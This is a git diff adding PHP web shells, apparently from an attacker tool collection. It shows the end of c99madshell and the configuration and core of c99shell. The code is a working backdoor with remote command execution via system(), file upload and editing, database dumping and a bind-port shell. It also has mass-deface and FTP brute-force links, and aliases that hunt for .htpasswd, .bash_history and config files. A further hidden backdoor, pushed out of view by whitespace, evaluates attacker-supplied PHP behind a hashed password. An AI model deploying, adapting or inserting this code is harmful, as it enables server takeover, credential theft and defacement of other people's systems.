+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form method=\"POST\"><input name='act' type='hidden' value='f'><input name='f' type='hidden' value='".urlencode($f)."'><input name='ft' type='hidden' value='edit'><input name='d' type='hidden' value='".urlencode($d)."'><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+if ($act == "about") {echo "r00t";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="#" onclick="document.todo.act.value='cmd';document.todo.d.value='<?php echo urlencode($d); ?>';document.todo.submit();"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='search';document.todo.submit();"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="#" onclick="document.todo.act.value='upload';document.todo.submit();"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form method="POST"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form method="POST"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form method="POST""><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99madshell v. <?php echo $shver; ?><a href="#" OnClick="document.todo.act.value='about';document.todo.submit();"><u> EDITED BY </b><b>MADNET</u></b> </a>| <a href="http://securityprobe.net"><font color="#FF0000">http://securityprobe.net</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit();
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/c99php.txt b/xakep-shells/PHP/c99php.txt
new file mode 100644
index 0000000..f890330
--- /dev/null
+++ b/xakep-shells/PHP/c99php.txt
@@ -0,0 +1,2735 @@
+<?php
+$shver = "1.0 beta (4.02.2005)"; //Current version
+//CONFIGURATION
+$surl = "?"; //link to this script, INCLUDE "?".
+$rootdir = "./"; //e.g "c:", "/","/home"
+$timelimit = 60; //limit of execution this script (seconds).
+
+//Authentication
+
+$login = false; //login
+//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
+$pass = "team"; //password
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
+//$login = false; //turn off authentication
+
+$autoupdate = true; //Automatic updating?
+
+$updatenow = false; //If true, update now
+
+$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server
+
+$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod
+
+$filestealth = 1; //if true, don't change modify&access-time
+
+$donated_html = ""; //If you publish free shell and you wish
+					//add link to your site or any other information,
+					//put here your html.
+$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.
+
+$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")
+
+$curdir = "./"; //start directory
+
+$tmpdir = dirname(__FILE__); //Directory for tempory files
+  
+// Registered file-types.
+//  array(
+//   "{action1}"=>array("ext1","ext2","ext3",...),
+//   "{action2}"=>array("ext1","ext2","ext3",...),
+//   ...
+//  )
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
+ "img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar")
+);
+
+$hexdump_lines = 8;	// lines in hex preview file
+$hexdump_rows = 24;	// 16, 24 or 32 bytes in one line
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+$bindport_pass = "c99";	// default password for binding
+$bindport_port = "11457";	// default port for binding
+
+/* Command-aliases system */
+$aliases = array();
+$aliases[] = array("-----------------------------------------------------------", "ls -la");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ suid áèòîì */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
+/* ïîèñê íà ñåðâåðå âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ ôàéëîâ ñ sgid áèòîì */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
+/* ïîèñê íà ñåðâåðå ôàéëîâ config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
+/* ïîèñê íà ñåðâåðå âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
+/* ïîèñê â òåêóùåé äèðåêòîðèè âñåõ äèðåêòîðèé è ôàéëîâ äîñòóïíûõ íà çàïèñü äëÿ âñåõ */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
+/* ïîèñê íà ñåðâåðå ôàéëîâ service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
+/* ïîèñê íà ñåðâåðå ôàéëîâ .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
+/* ïîèñê âñåõ ôàéëîâ .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
+/* ïîèñê âñåõ ôàéëîâ .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
+/* ïîèñê â òåêóùåé äèðåêòîðèè ôàéëîâ .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
+/* âûâîä ñïèñêà àòðèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
+/* ïðîñìîòð îòêðûòûõ ïîðòîâ */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");
+
+$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
+$sess_cookie = "c99shvars"; // cookie-variable name
+
+if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
+$sess_file = $tmpdir."c99shvars_".$sid.".tmp";
+
+$usefsbuff = true; //Buffer-function
+$copy_unset = false; //Delete copied files from buffer after pasting
+
+//Quick launch
+$quicklaunch = array();
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=home\" title=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl);
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=back\" title=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=forward\" title=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=up\" title=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=refresh\" title=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">","");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=search\" title=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d");
+$quicklaunch[] = array("<img src=\"".$surl."act=img&img=buffer\" title=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d");
+$quicklaunch[] = array("<b>Mass deface</b>",$surl."act=massdeface&d=%d");
+$quicklaunch[] = array("<b>Bind</b>",$surl."act=bind&d=%d");
+$quicklaunch[] = array("<b>Processes</b>",$surl."act=ps_aux&d=%d");
+$quicklaunch[] = array("<b>FTP Quick brute</b>",$surl."act=ftpquickbrute&d=%d");
+$quicklaunch[] = array("<b>LSA</b>",$surl."act=lsa&d=%d");
+$quicklaunch[] = array("<b>SQL</b>",$surl."act=sql&d=%d");
+$quicklaunch[] = array("<b>PHP-code</b>",$surl."act=eval&d=%d");
+$quicklaunch[] = array("<b>PHP-info</b>",$surl."act=phpinfo\" target=\"blank=\"_target");
+$quicklaunch[] = array("<b>Self remove</b>",$surl."act=selfremove");
+$quicklaunch[] = array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()");
+
+//Hignlight-code colors
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+
+@$f = $_GET[f];
+
+//END CONFIGURATION
+
+// 				\/	Next code not for editing	 \/
+
+
+//Starting calls
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+   if ($shver < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret[err][] = mysql_error();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row[1].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+   if (is_dir($d.$f))
+   {
+    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+    c99fsearch($d.$f);
+   }
+   else
+   {
+    if ($true)
+    {
+     if (!empty($a[text]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+      else {$true = strinstr($a[text],$r);}
+      if ($a[text_not])
+      {
+       if ($true) {$true = false;}
+       else {$true = true;}
+      }
+      if ($true) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($handle);
+}
+}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string","#DD0000"); //#DD0000
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY 